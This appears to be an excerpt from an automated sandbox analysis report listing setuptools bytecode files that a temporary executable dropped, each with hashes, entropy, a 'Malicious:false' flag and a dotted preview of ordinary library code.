                                                                                                                                            Preview:...........e.y..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z&..d.d.l'm(Z(..d.d.l)m*Z*..e.r.d.d.l+m,Z,..e.j-........d.k.....r.d.d.l.m.Z...n.e.r.d.d.l/m.Z...n.d.d.l0m1Z...e.e2e.f...........Z3..e.d.e3................Z4..e.j5........e6..............Z7..G.d...d.e...............Z8d.Z9d.Z:..G.d...d.e ..............Z;..G.d...d.e...............Z<..G.d...d...............Z=..G.d...d.e=..............Z>..G.d ..d!..............Z?d"e.d#e@f.d$..ZAd%e.e2..........d&e.e2e2f...........d'e.d#e@f.d(..ZBd)..ZCd*e*d#e.e2..........f.d+..ZDd*e*d#e.e2..........f.d,..ZEd%e.e2..........d&e.e2e2f...........d-e3d#e.e2e2f...........f.d...ZFd/e3d#e2f.d0..ZGd1e.e2e2f...........d#e.e2..........f.d2..ZHd%e.e2..........d1e.e2e2f...........d#e.e.e2e.e2..........f.....................f.d3..ZId1e.e2e2f...........d#e.e2e2f.........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\egg_info.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39859
                                                                                                                                            Entropy (8bit):5.251333714537335
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:IZoXBsb0E5EQkkjiEpdwwQuIBuGKU3uTizx/gi:LXe4E5QkjiFaDvyx/D
                                                                                                                                            MD5:BEE88DA8AFCE4E493BF3037714811743
                                                                                                                                            SHA1:2F79F26844784E9261DBA6DF46DA581400B3D279
                                                                                                                                            SHA-256:6094913245B4840CA31215A15C351D3CEC4672507DAAAB8C0AD9DB682056529C
                                                                                                                                            SHA-512:45C326F52DE89A4E83E030939B80B5C957D3EEBD9F9E0DD38CA69F5874341E7C6D0D0CED48F3128F2CB74A562D67FE70A6D56888918BF47094971A0FA1EBFF0B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.h..............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l.m-Z-..d...Z...G.d...d...............Z/..G.d...d.e/e...............Z0..G.d...d.e...............Z...G.d...d.e...............Z1d...Z2d...Z3d...Z4d ..Z5d!..Z6d"..Z7d#..Z8d$..Z9d+d&..Z:d'..Z;d(..Z<..G.d)..d*e-..............Z=d.S.),zUsetuptools.command.egg_info..Create a distribution's .egg-info directory and contents.....)...FileList)...DistutilsInternalError)...convert_path)...logN.....)...metadata)..._entry_points)...Command)...sdist)...walk_revctrl)...edit_config)...bdist_egg)...Requirement..safe_name..parse_version..safe_version..to_filename)...glob)...packaging)...yield_lines)...SetuptoolsDeprecationWarningc...........................d.}...|.j.......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\install.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6841
                                                                                                                                            Entropy (8bit):5.265384367060656
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:srHACEQ8TzdjtqhTk2insGgqgFi4Isdh3Hha3mllOJi5aJH6ZOauEx:cghHdjtqZLSgFi45Xhkmlgi5A6ZOLEx
                                                                                                                                            MD5:E8B53B46CB1965931F018A442BFDADCE
                                                                                                                                            SHA1:E6974A4DDA44F7D31D7A7B6D1086685521CA3217
                                                                                                                                            SHA-256:F9DBAE436F65B7D1DB77F844BFA3A6D682D46F9FADDEE58330BBCF074C88505B
                                                                                                                                            SHA-512:110794CD932138001B177492ADB24485A4A4389CAF8E0D39456ABCB183BE388C0C9D5752EF40392048FEB8F1D0BB6DA82C1BE7932B829CAC9EA72306A50E0D3F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e+...............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.c...m.Z...d.d.l.Z.e.j.........Z...G.d...d.e.j.......................Z.d...e.j.........j.........D...............e.j.........z...e._.........d.S.)......)...DistutilsArgErrorNc..........................e.Z.d.Z.d.Z.e.j.........j.........d.d.g.z...Z.e.j.........j.........d.d.g.z...Z.d.d...f.d.d...f.g.Z...e.e...............Z.d...Z.d...Z.d...Z.d...Z.e.d.................Z.d...Z.d.S.)...installz7Use easy_install to install the package, w/dependencies)...old-and-unmanageableNz.Try not to use this!)..!single-version-externally-managedNz5used by system package builders to create 'flat' eggsr....r......install_egg_infoc...........................d.S...NT......selfs.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\install.py..<lambda>z.install.<lambda>....s.......$.........install_scriptsc...........................d.S.r....r....r....s.... r....r.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\install_egg_info.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4154
                                                                                                                                            Entropy (8bit):5.126861596447786
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:FZkWIJ8OhMJZIUVhz7doTCh26V6PMvP3Eiqmffn:TI2Oh0Z3VhzWAki3Tqmffn
                                                                                                                                            MD5:DCD5D77CFCDAC6030FB6AA9C26C6CADE
                                                                                                                                            SHA1:40CF96676F4A78BEFE0535517E7A14437013E850
                                                                                                                                            SHA-256:752D934CA9BB170BECEFA3F09B4AEAB32F7428E8BACF78F7BB59A870095DF13B
                                                                                                                                            SHA-512:E557A8E62F0BACC230176A1501B43D86224E165B7F344A7B37A7ABC017A4F46745E4AD3FE3DD9FA7700EFF869F24579ED5C1CFEFEB8AE0003047E8AF82CFCE4D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................~.....d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z...G.d...d.e.j.........e...............Z.d.S.)......)...log..dir_utilN)...Command)...namespaces)...unpack_archive.....)...ensure_directoryc.....................:.....e.Z.d.Z.d.Z.d.Z.d.g.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...install_egg_infoz.Install an .egg-info directory for the package).z.install-dir=..dz.directory to install toc...........................d.|._.........d.S...N)...install_dir....selfs.... .wC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\install_egg_info.py..initialize_optionsz#install_egg_info.initialize_options....s.........................c.....................B.....|.......................d.d.................|.......................d...............}.t...........j.........d.d.|.j.........|.j...........................................................d.z...}.|.j.........|._.........t..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\install_lib.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6436
                                                                                                                                            Entropy (8bit):5.42207434899097
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:n4R3ndJAM0R+xluQIKDTf3SKUKt9BbFx+KPn1r8/TJ+yn:4JdalRG5/f3eKzBH+MG13
                                                                                                                                            MD5:3C3C652B2ABE192CC0791FAFA7415A74
                                                                                                                                            SHA1:E4C54AB2A5EC980EF620ADEEBCBBC955EB689186
                                                                                                                                            SHA-256:CD4E0F24B808158BD17FB087CFF1184C68E14D806BDE2E9D08EF7AA7A09008C8
                                                                                                                                            SHA-512:4AA09840CF50A990B5748169F5989090C460DD7092F8758C793E907FD0EA2CF7140477906251D3C086DC43E9CAA115521BBB1EDB9B994656567E6F8FC216CC5A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e#.........................^.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.c...m.Z.....G.d...d.e.j.......................Z.d.S.)......N)...product..starmapc.....................f.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.e.d.................Z.d...Z.e.d.................Z...d.d...Z.d...Z.d.S.)...install_libz9Don't add compiled flags to filenames of non-Python filesc..........................|.......................................|.....................................}.|...|.......................|.................d.S.d.S...N)...build..install..byte_compile)...self..outfiless.... .rC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\install_lib.py..runz.install_lib.run....sD......................<.<.>.>..................h..'..'..'..'..'.... ........c...............................f.d.........................................D...............}.t...........|.....................................................}.t...........t.............j...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\install_scripts.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4305
                                                                                                                                            Entropy (8bit):5.296456951994526
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:9qC/WpylCjaKAOpg/H9r4dB6Bnj84ua/1nshw:9jsytOpg/H9mAnj8Xo1t
                                                                                                                                            MD5:BB7ABB9752E57076CC5259AF240E0D81
                                                                                                                                            SHA1:74939BBC2BC20C0A3DF81E4C5CDB4F9086100E33
                                                                                                                                            SHA-256:398CEF3A70680ED69F33FD942979EBD08CE4D2BD67839EB50F42749623BFEB65
                                                                                                                                            SHA-512:BD3A589F2E5C441AA2F3762E7DCED9D267E2EEF16695DE14A8CA2D70B87201D4E98F206FB5D287C6C248B50BB567A3E25C6F53093A3CA242D2DB398975015DC1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e4..............................d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z.d.S.)......)...logN)...DistutilsModuleError)...Distribution..PathMetadata.....)...ensure_directoryc.....................&.....e.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.S.)...install_scriptsz;Do normal script install, plus any egg_info wrapper scriptsc.....................R.....t...........j...............................|.................d.|._.........d.S.).NF)...origr......initialize_options..no_ep)...selfs.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\install_scripts.pyr....z"install_scripts.initialize_options....s$............./../....5..5..5................c.....................X.....d.d.l.m.c...m.}...|.......................d.................|.j.........j.........r t...........j...............................|.................n.g.|._.........|.j.........r.d.S.|....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\launcher manifest.xml

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):628
                                                                                                                                            Entropy (8bit):4.569734347992454
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:TMHdtlw+53gV8eXCSNewxCglY0kiVQxA0y:2dtlwe3grXRNpxDlYbi/T
                                                                                                                                            MD5:0B558625CA3F941533EC9F652837753C
                                                                                                                                            SHA1:403EE9B5C7A834A1B3905A87A4C6318E68609996
                                                                                                                                            SHA-256:C652DB8D6AC1D35B4A0B4FA195590E2A48923DBCCC9A5D9E38FB49FEE7029DB1
                                                                                                                                            SHA-512:956E70AF1B3DC200A70F70C04AA467522D96FC1A1ABF8928EF60BE72DF0BCBDEF50BBDCC20330EE4B5F9FCB0C7EE546849B5BE72EF9EE071475F6BBA2E405CBF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">. <assemblyIdentity version="1.0.0.0". processorArchitecture="X86". name="%(name)s". type="win32"/>. Identify the application security requirements. -->. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">. <security>. <requestedPrivileges>. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>. </requestedPrivileges>. </security>. </trustInfo>.</assembly>.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\py36compat.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8062
                                                                                                                                            Entropy (8bit):5.101262931429714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:PGuiDIik56mALnz5CX4eFVx85DnRQohKCcIUb2QAMA07sBaYDOE/bMq6EV1kMo09:PGTDIAkX4eb2DR1hgIUSQzVwDPBzXou
                                                                                                                                            MD5:A9B955C52F783B054BE1A5744C66D542
                                                                                                                                            SHA1:29B04F0D1147F7ECB62C864F4D7ACCB15283E11F
                                                                                                                                            SHA-256:DE4F707C861204A00567CDFDBE183097DE09ADE22469A8369C4B9F1166FDB532
                                                                                                                                            SHA-512:617CF8FE48310B4B546E1CE515C1FD05EA4637E7FA8D9B7E304A0B46E8F73F000F541D5CD42A2A860E71B4545C7CC4A5DB4813EC4329893E111106F35A66534E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eR..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d...............Z...e.e.j.........d...............r...G.d...d...............Z.d.S.d.S.)......N)...glob)...convert_path)...sdistc.....................X.....e.Z.d.Z.d.Z.d...Z.e.d.................Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...sdist_add_defaultsz.. Mix-in providing forward-compatibility for functionality as found in. distutils on Python 3.7... Do not edit the code in this class except to update functionality. as implemented in distutils. Instead, override in the subclass.. c...........................|.......................................|.......................................|.......................................|.......................................|.......................................|.......................................|.......................................d.S.).a9...Add all the default files to self.filelist:. - README or README.t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\register.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1152
                                                                                                                                            Entropy (8bit):5.2122656006899835
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:2pHvg2Cp3Hmo7zilaY5t2mSHncmRueevD11bfdMegilGUE:2mvp3HmKaamt2mSHcocrKPms
                                                                                                                                            MD5:EAC5D5D6E162F612FDBED77AD98B68AF
                                                                                                                                            SHA1:F28362F5A0963E25B2A3242065DF58389A501F54
                                                                                                                                            SHA-256:6F16F4E895FD48C152075C6BA3E859535D67ECF7585B12DA62045D9ABA5D0A6F
                                                                                                                                            SHA-512:537EE4C128851A20530CC1420365E153126888B895C12EF2917AC5A6E02D3A9D1FC20D25900A53C4AB658ED02ECC720FED81214F26A09EE4461CF4E03EA2811D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................V.....d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z.d.S.)......)...logN)...RemovedCommandErrorc...........................e.Z.d.Z.d.Z.d...Z.d.S.)...registerz+Formerly used to register packages on PyPI.c.....................j.....d.}.|.......................d.|.z...t...........j.........................t...........|.................).Nz]The register command has been removed, use twine to upload instead (https://pypi.org/p/twine)z.ERROR: )...announcer......ERRORr....)...self..msgs.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\register.py..runz.register.run....s6.........3...............i.#.o.s.y..1..1..1..!.#..&..&..&.....N)...__name__..__module__..__qualname__..__doc__r......r....r....r....r........s)...............5..5....'....'....'....'....'r....r....)...distutilsr......distutils.command.register..commandr......orig..setuptools.errorsr....r....r....r...

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\rotate.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4212
                                                                                                                                            Entropy (8bit):5.304064368467767
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:XUxohX2mtKh3bA9bjdGAui637QLPUyWEbxdT9uZhWn/6vW0K3yZZ62M1lbvPA/nr:XUjA9bBGA5JPYOP8W/6vWHUGpvPOX
                                                                                                                                            MD5:32CCF9286C28FCE9E278ABD6B83DA517
                                                                                                                                            SHA1:DB25AED3E233ADAAF03C7E85B41B5DE017D1721F
                                                                                                                                            SHA-256:BCC3E1B9EDAC2BBCCCFB4B5A6A8F5ADBBA7E0D811603D96C609CE8393756969F
                                                                                                                                            SHA-512:5B15B25C529FEF3D5FE9E5D2E0D2F63E3D0FDB1869588059DF6DA091EF6A9C557AA0BA2296C3DE59D4779924B03F07F4DBF234DCC09FC481EE7A9E8F82FF1012
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eP.........................b.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.e...............Z.d.S.)......)...convert_path)...log)...DistutilsOptionErrorN)...Commandc.....................4.....e.Z.d.Z.d.Z.d.Z.g.d...Z.g.Z.d...Z.d...Z.d...Z.d.S.)...rotatez.Delete older distributionsz2delete older distributions, keeping N newest files).).z.match=..mz.patterns to match (required)).z.dist-dir=..dz%directory where the distributions are).z.keep=..kz(number of matching distributions to keepc.....................0.....d.|._.........d.|._.........d.|._.........d.S.).N)...match..dist_dir..keep)...selfs.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\rotate.py..initialize_optionsz.rotate.initialize_options....s....................................c..........................|.j...........t...........d.................|.j...........t...........d...................t...........|.j.......................|

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\saveopts.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1392
                                                                                                                                            Entropy (8bit):5.381932986682869
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:d3//DEyCTHc/QG+0cGuF+H2mxR7XlFGO7gi72VRjtjMM7TjAvvLvP:t8TBGraF+H2mxpXlFGOJCpjMM7TjAvvj
                                                                                                                                            MD5:AE29FDA56FFEFCDF7BC1DDEE5F2A0E52
                                                                                                                                            SHA1:1F7514AA16FE50F776EDB52B03039F93AE507990
                                                                                                                                            SHA-256:DE07834FFB61D7E9D6F399D595C6D8C5F7CE72DB32CD06DB6C0BFA9947E04F4E
                                                                                                                                            SHA-512:1D2CB258FBE5CDD6E00DCCA32C2F50E6CA30BFD584405D187FB70BDA313911F3200414450819B992CECC7B01F18F1B8F93C75A436F2363AB416AEB09D11A3148
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................2.....d.d.l.m.Z.m.Z.....G.d...d.e...............Z.d.S.)......)...edit_config..option_basec...........................e.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...saveoptsz#Save command-line options to a filez7save supplied options to setup.cfg or other config filec...........................|.j.........}.i.}.|.j.........D.]X}.|.d.k.....r...|.......................|...................................................D.]'\...}.\...}.}.|.d.k.....r.|.|.......................|.i...............|.<....(.Yt...........|.j.........|.|.j.........................d.S.).Nr....z.command line)...distribution..command_options..get_option_dict..items..setdefaultr......filename..dry_run)...self..dist..settings..cmd..opt..src..vals.... .oC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\saveopts.py..runz.saveopts.run....s........... ............'....<....<.C....j.. .. ....#'.#7.#7...#<.#<.#B.#B.#D.#D....<....<.....Z.c.3.......(.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\sdist.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13464
                                                                                                                                            Entropy (8bit):5.248004862719262
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:1/hL8V+g6mSfZCemMbJGxgiBkXqIbSGYKkSL15OLJtBG9RpQuJCJbKIGp:1/tzg6HZ3/Gxgi6XqIPYKkmiuJC+Bp
                                                                                                                                            MD5:6817D474C80F92EA41017DD01BC74C18
                                                                                                                                            SHA1:70838F6CE16EF21F07DB49EBAE8290928376BD23
                                                                                                                                            SHA-256:53DD521793A644FED8F481277E8DF84DC7536789B4BA73DFB0968BEF6CE09C41
                                                                                                                                            SHA-512:93175EBB824E8B6A3DB44BAC4B8A58A1BD4799CAA954FE2C341D8A9438E7D0603B5CF5B8CA75F9275020EB281D980DC86BB77AA5E143703E24E002170341D7BF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.Z.d.d...Z...G.d...d.e.e.j.......................Z.d.S.)......)...logN)...chain.....)...sdist_add_defaults.....)...metadata)..._ORIGINAL_SUBCOMMANDS..c................#.......K.....t...........j.........d.................D.]&}...|.....................................|...............D.].}.|.V........'d.S.).z%Find all files under revision controlz.setuptools.file_finders)...groupN).r......entry_points..load)...dirname..ep..items.... .lC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\sdist.py..walk_revctrlr........s_..............#.*C..D..D..D................B.G.G.I.I.g..&..&...........D....J.J.J.J....................c.............................e.Z.d.Z.d.Z.g.d...Z.i.Z.g.d...Z...e.d...e.D.............................Z.d...Z.d...Z.d...Z.d...Z.e.e.j.........d..........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\setopt.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7704
                                                                                                                                            Entropy (8bit):5.332317270755262
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:6EB56HrZJNrrcJ98yXkys2wRn/PuTs2zUmVAjKn+X5qwoUEi:6s6Hrlru93Xk+wRG/4mVeX5qEEi
                                                                                                                                            MD5:4AE10034F4E9B4E372B8051EBFD868B3
                                                                                                                                            SHA1:413DA3E802296EE29EBD7AB0730D4CE1172ADFA0
                                                                                                                                            SHA-256:6E67381BAC903DF7F6AF869A45413EE4F6C8DA6D099D4C6B38553DBC3B366C66
                                                                                                                                            SHA-512:80D8B65528ED7AF07B8299362F0A1AC376F1210108AEEAEC306E60F4857EAF6DD23C5628928B69884630EA01684F26A0670F08C9962F097D07EE5669DAD599CC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.d.d...Z.d.d...Z...G.d...d.e...............Z...G.d...d.e...............Z.d.S.)......)...convert_path)...log)...DistutilsOptionErrorN)...Command)...config_file..edit_config..option_base..setopt..localc.....................^.....|.d.k.....r.d.S.|.d.k.....rGt...........j...............................t...........j...............................t...........j.......................d...............S.|.d.k.....rCt...........j.........d.k.....r.d.p.d.}.t...........j...............................t...........d.|.z...............................S.t...........d.|.................).z.Get the filename of the distutils, local, global, or per-user config.. `kind` must be one of "local", "global", or "user". r....z.setup.cfg..globalz.distutils.cfg..user..posix.....z.~/%spydistutils.cfgz7config_file() type must be 'local', 'global', or 'user')...os..path..join..dirname..distu

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\test.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14645
                                                                                                                                            Entropy (8bit):5.230877623823204
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CQZveHJpvqW0B0CUk6dHxik4PiXgkfgVJ1M9PdJCfEieW3dNVHEj:CyGqW0BPF6dHInOgk67GPzCMib332j
                                                                                                                                            MD5:E5EFA6CBACE2F4772B28427DB220F449
                                                                                                                                            SHA1:4F60E724BF9B8871B359D0A5FFC3CCC26A937357
                                                                                                                                            SHA-256:01876008BA5E5FA2C801D1985C486470285D7D8C77709D52FC24F2D05B4A7D16
                                                                                                                                            SHA-512:6627D469F20E7342CD12F5B105666188DFF595FF04EA2B3165B0B7F00D6EDEBEB056CEB5B0B5017900F54A1EEF9C30F794BCE00EE35D6F5DC16D2488F4AAE1DB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z...G.d...d...............Z...G.d...d.e...............Z.d.S.)......N)...DistutilsError..DistutilsOptionError)...log)...TestLoader)...resource_listdir..resource_exists..normalize_path..working_set..evaluate_marker..add_activation_listener..require.....)...metadata)...Command)...unique_everseen)...pass_nonec...........................e.Z.d.Z.d...Z.d.d...Z.d.S.)...ScanningLoaderc.....................T.....t...........j.........|.................t.........................|._.........d.S...N).r......__init__..set.._visited....selfs.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\test.pyr....z.ScanningLoader.__init__....s"............D..!..!..!....................Nc..........................|.|.j

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\upload.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1116
                                                                                                                                            Entropy (8bit):5.200249283438157
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:Yf2X2uoglaYsnX2mu0mRx73IW2yMbzkzzd:62l/aznX2m7op2xbQnd
                                                                                                                                            MD5:F5331E18BF2131BD323F8ABAAF982A18
                                                                                                                                            SHA1:8EEC81B22E0DEF6B3A963BA1B498D471502E2E2C
                                                                                                                                            SHA-256:B56DAAC5CAB26240671226E4DCA46FCAF6B833DAA098E7A7E6E80F9F5093C024
                                                                                                                                            SHA-512:66A6020E7E11FD29514B6AC935C2B0662DA38E813E8D2892116DE818429D75E9FCFECEED1CDAEBB876B335351EEC988ECC8185A642CB703AF5E453A68C3578A3
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................P.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z.d.S.)......)...log)...upload)...RemovedCommandErrorc...........................e.Z.d.Z.d.Z.d...Z.d.S.).r....z)Formerly used to upload packages to PyPI.c.....................j.....d.}.|.......................d.|.z...t...........j.........................t...........|.................).Nz[The upload command has been removed, use twine to upload instead (https://pypi.org/p/twine)z.ERROR: )...announcer......ERRORr....)...self..msgs.... .mC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\command\upload.py..runz.upload.run....s6.........3...............i.#.o.s.y..1..1..1..!.#..&..&..&.....N)...__name__..__module__..__qualname__..__doc__r......r....r....r....r........s)...............3..3....'....'....'....'....'r....r....N)...distutilsr......distutils.commandr......orig..setuptools.errorsr....r....r....r......<module>r........sq.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\command\upload_docs.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11967
                                                                                                                                            Entropy (8bit):5.370271346443042
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:c+9h4TtmNaquxcQMkBEdsvoLb7ZxLPrhtzwZQ/Mzv:cotN9kcGes0ZxLPg6/4v
                                                                                                                                            MD5:AAEFB04EC92F3264E3C388F5F4358A8B
